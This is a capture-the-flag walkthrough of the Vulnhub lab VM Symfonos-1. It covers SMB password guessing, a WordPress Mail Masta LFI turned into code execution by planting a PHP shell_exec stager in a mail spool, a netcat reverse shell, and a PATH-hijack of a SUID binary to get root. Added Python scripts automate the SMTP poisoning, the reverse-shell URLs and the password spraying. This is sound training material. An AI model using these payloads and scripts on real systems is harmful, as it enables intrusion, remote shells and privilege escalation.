Vulnhub: Symfonos-1

This is the first box in the symfonos series. The series is really well done and is reminiscent of the boxes on HackTheBox, focusing more on exploitation than on puzzle-y stuff.

Scanning:

Find the device on the network with a port scan.

crazyeights@es-base:~$ nmap -PS 192.168.56.1-255

Nmap scan report for 192.168.56.132
Host is up (0.00019s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

More detailed scanning

Identify the versions of the running services and check all 65535 ports for anything uncommon (unnecessary details stripped from the output):

crazyeights@es-base:~$ nmap -A -p- 192.168.56.132

Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Important detail: the host/NetBIOS name is symfonos (used as the SMB domain below).

Web:

I always check web first.
The index page is just a single image.

Ran dirb on the site to check for other files and folders:

crazyeights@es-base:~$ dirb http://192.168.56.132
  • Found nothing

  • Downloaded the image to check for hidden text or files

Stego:

Using exiftool, found the painting name:

crazyeights@es-base:~/Downloads$ exiftool image.jpg 

File source: https://commons.wikimedia.org/wiki/File:Peter_Paul_Rubens_-_The_Fall_of_Phaeton_(National_Gallery_of_Art).jpg
  • I doubt that's important

  • Nothing else in the image

  • Moving on to SMB services

SMB:

Identify null-session shares

Null session - connecting with an empty username and an empty password (smbclient -N). List the shares anonymously:

crazyeights@es-base:~$ smbclient -L \\symfonos -I 192.168.56.132 -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available

Two interesting shares:

  • anonymous

  • helios

Identify what permissions we have for those shares:

crazyeights@es-base:~$ smbmap -H 192.168.56.132 -d symfonos
                                
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	helios                                            	NO ACCESS	Helios personal share
	anonymous                                         	READ ONLY	
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.5.16-Debian)
crazyeights@es-base:~$ 

Try to connect to anonymous:

crazyeights@es-base:~$ smbclient \\\\symfonos\\anonymous -I 192.168.56.132 -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 21:14:49 2019
  ..                                  D        0  Fri Jun 28 21:12:15 2019
  attention.txt                       N      154  Fri Jun 28 21:14:49 2019

smb: \> get attention.txt 
getting file \attention.txt of size 154 as attention.txt (18.8 KiloBytes/sec) (average 18.8 KiloBytes/sec)

The file attention.txt contains the following message:

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

So there are users with weak passwords, and we have three candidate passwords straight from the admin's note.

Finding users:

Using enum4linux we find the user helios:

crazyeights@es-base:~$ enum4linux 192.168.56.132

S-1-5-21-3173842667-3005291855-38846888-1000 SYMFONOS\helios (Local User)
S-1-22-1-1000 Unix User\helios (Local User)

Guessing helios's password

Using the Metasploit auxiliary module smb_login (online password guessing over SMB, not offline cracking) we get helios's password:

msf5 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner


msf5 > use 0
msf5 auxiliary(scanner/smb/smb_login) > options

msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE symfonos_user.txt
USER_FILE => symfonos_user.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.56.132
RHOSTS => 192.168.56.132
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain symfonos
SMBDomain => symfonos
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE lists/rockyou-40.txt
PASS_FILE => lists/rockyou-40.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit
[SNIP]
[+] 192.168.56.132:445    - 192.168.56.132:445 - Success: 'symfonos\helios:qwerty'
[*] 192.168.56.132:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Could have just tried the three passwords quoted in attention.txt instead of a rockyou slice; 'qwerty' is one of them.
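As an added example (not from the original writeup), here is what that targeted approach looks like in a few lines of Python: pull every quoted token out of attention.txt and try each one against the helios share with smbclient. The host, share and user are the box's; the helper names and the smbclient-based check are my assumptions, and ATTENTION_TXT is a constructed copy of the note shown above. On a real engagement, check the lockout policy before spraying even a short list.

```python
#!/usr/bin/env python3
"""Turn the leaked hint in attention.txt into a targeted guess list and
try it against an SMB share with smbclient.  Added example: the note text
is from the writeup; the function names and the check are mine."""
import re
import subprocess
import sys

# Constructed copy of attention.txt as shown in the writeup.
ATTENTION_TXT = """Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus
"""


def hinted_passwords(text):
    """Every single-quoted token in the note, in order, duplicates removed."""
    seen, out = set(), []
    for pw in re.findall(r"'([^']+)'", text):
        if pw not in seen:
            seen.add(pw)
            out.append(pw)
    return out


def try_smb_login(host, share, user, password, timeout=10):
    """True if smbclient can list `share` as user:password.
    smbclient exits non-zero on NT_STATUS_LOGON_FAILURE / ACCESS_DENIED,
    so the return code is enough to tell a hit from a miss."""
    r = subprocess.run(
        ["smbclient", f"//{host}/{share}", "-U", f"{user}%{password}", "-c", "ls"],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=timeout)
    return r.returncode == 0


def guess(host, share, user, candidates):
    """First candidate that authenticates, or None."""
    for pw in candidates:
        if try_smb_login(host, share, user, pw):
            return pw
    return None


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.132"
    hit = guess(host, "helios", "helios", hinted_passwords(ATTENTION_TXT))
    print(f"helios:{hit}" if hit else "no hit")
```

Three guesses against a share the user owns is far quieter than a 40k-line rockyou run, and in this case it finds the same answer.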

Login to the helios share:

crazyeights@es-base:~$ smbclient \\\\symfonos\\helios -I 192.168.56.132 -U 'helios'
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 20:32:05 2019
  ..                                  D        0  Fri Jun 28 20:37:04 2019
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019

		19994224 blocks of size 1024. 17295092 blocks available
smb: \> more todo.txt 
getting file \todo.txt of size 52 as /tmp/smbmore.z3DDVD (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \> more research.txt 
getting file \research.txt of size 432 as /tmp/smbmore.vlA0LD (20.1 KiloBytes/sec) (average 10.7 KiloBytes/sec)

Contents of research.txt:

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

Contents of todo.txt:

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Browse to /h3l105 and you get a WordPress site.

  • It renders badly because the site URL points at symfonos.local, which doesn't resolve from the attacking machine; fix it by adding the host name

  • Add the following line to /etc/hosts

192.168.56.132	symfonos.local

Enumerate Users:

Use wpscan to enumerate users:

crazyeights@es-base:~$ wpscan --url http://symfonos.local/h3l105/ -e u

There is only 1 user:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Guess the admin password:

Tried various wordlists against the login form; couldn't get it:

crazyeights@es-base:~$ wpscan --url http://symfonos.local/h3l105/ --passwords lists/rockyou-40.txt --usernames admin

Plugin Exploits:

  • Looking for unauthenticated WordPress exploits

  • There are two plugins (in the wpscan output):

  • mail-masta version 1.0

  • site-editor version 1.1.1

Use searchsploit to identify exploits:

crazyeights@es-base:~$ searchsploit wordpress mail

WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                    | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection                                           | php/webapps/41438.txt

There are two exploits for Mail Masta. Trying the LFI: count_of_send.php passes the pl parameter straight to include(), so the target file is not just read back, it is executed as PHP:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

  • We must now find a way to execute commands using this vulnerability. Since include() runs whatever it loads, we need a file on disk that we can write PHP into.

  • Postfix is listening on port 25 and delivers local mail to the plain-text mbox /var/mail/<user>, so we can use it for log poisoning.

  • Put PHP code in a mail header; when the LFI includes the mailbox, the code is executed.

  • I have never done this before, but it worked:

crazyeights@es-base:~$ telnet 192.168.56.132 25
Trying 192.168.56.132...
Connected to 192.168.56.132.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO dummy
250 symfonos.localdomain
MAIL FROM: "dummy <?php echo shell_exec($_GET['cmd']);?>"
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

data>
.
250 2.0.0 Ok: queued as 736B940698

The message, header included, is now stored in /var/mail/helios.

Include helios's mailbox through the LFI and pass the command in the cmd parameter:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id

The PHP in the header runs and the output of id appears in the middle of the mail text:

Now do the same with a reverse shell, using nc for simplicity (this needs a netcat build that supports -e, which this box has):

nc -e /bin/sh 192.168.56.1 1234

Start the listener on the attacking machine:

nc -lvp 1234

Go to the URL with the cmd param set to the reverse shell (the browser URL-encodes the spaces for you; with curl or wget they must be sent as %20):

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 192.168.56.1 1234
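The whole chain above as an added example script, not part of the original writeup: it builds the SMTP dialogue that plants the stager, sends it in lockstep with the server replies (body lines after DATA get no reply until the terminating dot), and produces correctly URL-encoded include URLs for id and for the reverse shell. The host, plugin path, user and PHP stager are the ones used above; the function names, the SMTP client logic and the assumption that Postfix copies the loose envelope sender into the stored headers are mine (it did on this box, a stricter MTA might reject the address).

```python
#!/usr/bin/env python3
"""LFI -> mail-spool poisoning -> command execution, as scripted helpers.
Added example: host, user, plugin path and stager are the writeup's; the
function names and the SMTP client are mine."""
import socket
import sys
from urllib.parse import quote, urlencode

HOST = "192.168.56.132"
BASE = "http://symfonos.local/h3l105"
LFI = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"
# Same stager the writeup uses; include() executes it when the mailbox is loaded.
STAGER = "<?php echo shell_exec($_GET['cmd']);?>"


def smtp_dialogue(rcpt, stager=STAGER, helo="dummy"):
    """Client side of the Postfix conversation that plants `stager` in
    /var/mail/<rcpt>.  The PHP rides in the envelope sender, which Postfix
    copies verbatim into the headers of the stored message (assumption,
    observed on this box)."""
    return [
        f"HELO {helo}",
        f'MAIL FROM: "dummy {stager}"',
        f"RCPT TO: {rcpt}",
        "DATA",
        "poison",          # body is irrelevant, the stager sits in the headers
        ".",
        "QUIT",
    ]


def deliver(host, lines, port=25, timeout=10):
    """Send the dialogue and return the server replies.  After a 354 the
    body lines are sent without waiting for replies until the '.' line;
    a 4xx/5xx reply stops the exchange so a rejection is visible."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        rf = s.makefile("rb")

        def read():
            reply = rf.readline().decode(errors="replace").rstrip()
            replies.append(reply)
            return reply

        read()                              # 220 banner
        in_data = False
        for line in lines:
            s.sendall((line + "\r\n").encode())
            if in_data:
                if line == ".":
                    in_data = False
                    read()                  # 250 2.0.0 Ok: queued as ...
                continue
            reply = read()
            if reply.startswith("354"):
                in_data = True
            elif reply[:1] in "45":
                break
    return replies


def lfi_url(include_path, cmd=None, base=BASE):
    """Include URL with the command URL-encoded: quote() instead of
    quote_plus() so spaces become %20, and '/' is kept literal so the
    path to the mailbox and /bin/sh stay readable in server logs."""
    q = {"pl": include_path}
    if cmd is not None:
        q["cmd"] = cmd
    return f"{base}{LFI}?{urlencode(q, safe='/', quote_via=quote)}"


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else HOST
    for reply in deliver(host, smtp_dialogue("helios")):
        print(reply)
    print(lfi_url("/var/mail/helios", "id"))
    print(lfi_url("/var/mail/helios", "nc -e /bin/sh 192.168.56.1 1234"))
```

Run it once to plant the stager, then fetch the printed URLs with curl (the second one with a listener already up). Planting twice is harmless: each delivery appends another copy of the stager to the mbox, and each copy runs on every include.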

User:

We now have access as the user helios:

id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Looked for a user flag; found none.

Root:

Find SUID binaries, i.e. programs that run with their owner's (here root's) privileges regardless of who launches them:

find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping

The obvious standout is /opt/statuscheck; everything else is stock Debian.

Checking out statuscheck:

cd /opt 

strings statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
[SNIP]

The strings output shows system plus the pieces curl -I , http://l and ocalhost (each 8-byte chunk is a movabs immediate, and the trailing H is the 0x48 prefix byte of the next instruction), i.e. statuscheck calls system("curl -I http://localhost") as root. curl is named without a path, and system() goes through /bin/sh, which resolves it via PATH.

./statuscheck
HTTP/1.1 200 OK
Date: Fri, 01 Jan 2021 16:13:37 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html
  • If we put our own program named curl, containing a shell, ahead of the real one in PATH, statuscheck will run it as root

  • Create an executable curl in /tmp and put /tmp first on the PATH

cd /tmp
echo "/bin/sh" > curl
chmod a+x curl
export PATH=/tmp:$PATH

When we run statuscheck now it runs our curl script instead of the real curl, and the shell it spawns has euid 0 (the real uid stays 1000, as id shows, but that is enough to read /root):

/opt/statuscheck
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
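An added example, not from the writeup, that turns the triage above into a script: it rebuilds the command from the 8-byte strings chunks, flags command strings that system() would resolve through PATH, and shows which file a given PATH picks for curl. The three strings lines and the /tmp-first PATH are from the walkthrough; the heuristics and helper names are my assumptions.

```python
#!/usr/bin/env python3
"""Triage a SUID binary that shells out.  Added example: the `strings`
lines and the PATH trick come from the writeup; the helpers and the
heuristics are mine."""
import os
import re
import stat
import sys

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")   # what `strings` (default -n 4) prints


def extract_strings(blob):
    """Printable runs of 4+ bytes, like the strings(1) default."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(blob)]


def rejoin_movabs_chunks(lines):
    """gcc builds short string literals on the stack with pairs of
    `movabs rax, imm64` / `mov [rbp-N], rax`.  strings then shows each
    8-byte immediate followed by 'H' (0x48, the REX.W prefix of the next
    instruction).  Merge consecutive runs of such 9-char lines.
    Heuristic: a genuine 8-char string ending in 'H' would be mangled, and
    a tail shorter than 8 bytes (stored with a narrower mov) is not merged."""
    merged, run = [], []
    for line in lines:
        if len(line) == 9 and line.endswith("H"):
            run.append(line[:8])
            continue
        if run:
            merged.append("".join(run))
            run = []
        merged.append(line)
    if run:
        merged.append("".join(run))
    return merged


SHELLS_OUT = {"system", "popen", "execvp", "execlp", "execvpe"}
COMMAND = re.compile(r"^[A-Za-z0-9_.+-]+\s+\S")   # "prog args", prog without a directory


def path_dependent_commands(strs):
    """Command-looking strings whose program name carries no directory.
    Only relevant when the binary imports a function that resolves names
    through PATH (system() runs `/bin/sh -c`, which does)."""
    if not SHELLS_OUT.intersection(strs):
        return []
    return [s for s in strs if COMMAND.match(s)]


def resolve(program, path_env, exists=os.path.isfile):
    """Which file a PATH lookup picks: the first directory in PATH order
    that holds `program`.  `exists` is injectable so a layout can be
    simulated without touching the filesystem."""
    for d in path_env.split(":"):
        candidate = os.path.join(d or ".", program)
        if exists(candidate):
            return candidate
    return None


def triage(path, path_env):
    """SUID bit, owner, and where each PATH-dependent command would land."""
    st = os.stat(path)
    report = {"suid": bool(st.st_mode & stat.S_ISUID), "owner_uid": st.st_uid}
    with open(path, "rb") as fh:
        strs = rejoin_movabs_chunks(extract_strings(fh.read()))
    report["commands"] = {c: resolve(c.split()[0], path_env)
                          for c in path_dependent_commands(strs)}
    return report


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/opt/statuscheck"
    print(triage(target, os.environ.get("PATH", "")))
```

Run it on the box as helios before and after `export PATH=/tmp:$PATH`: the resolved path for curl flips from /usr/bin/curl to /tmp/curl, which is exactly why the SUID wrapper hands out a root shell. The fix on the developer's side is an absolute path (or execve with a fixed argv and a scrubbed environment) instead of system().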

Root Flag:
cd /root
ls
proof.txt
cat proof.txt

Congrats on rooting symfonos:1!
[SNIPPED]

FIN. 🥳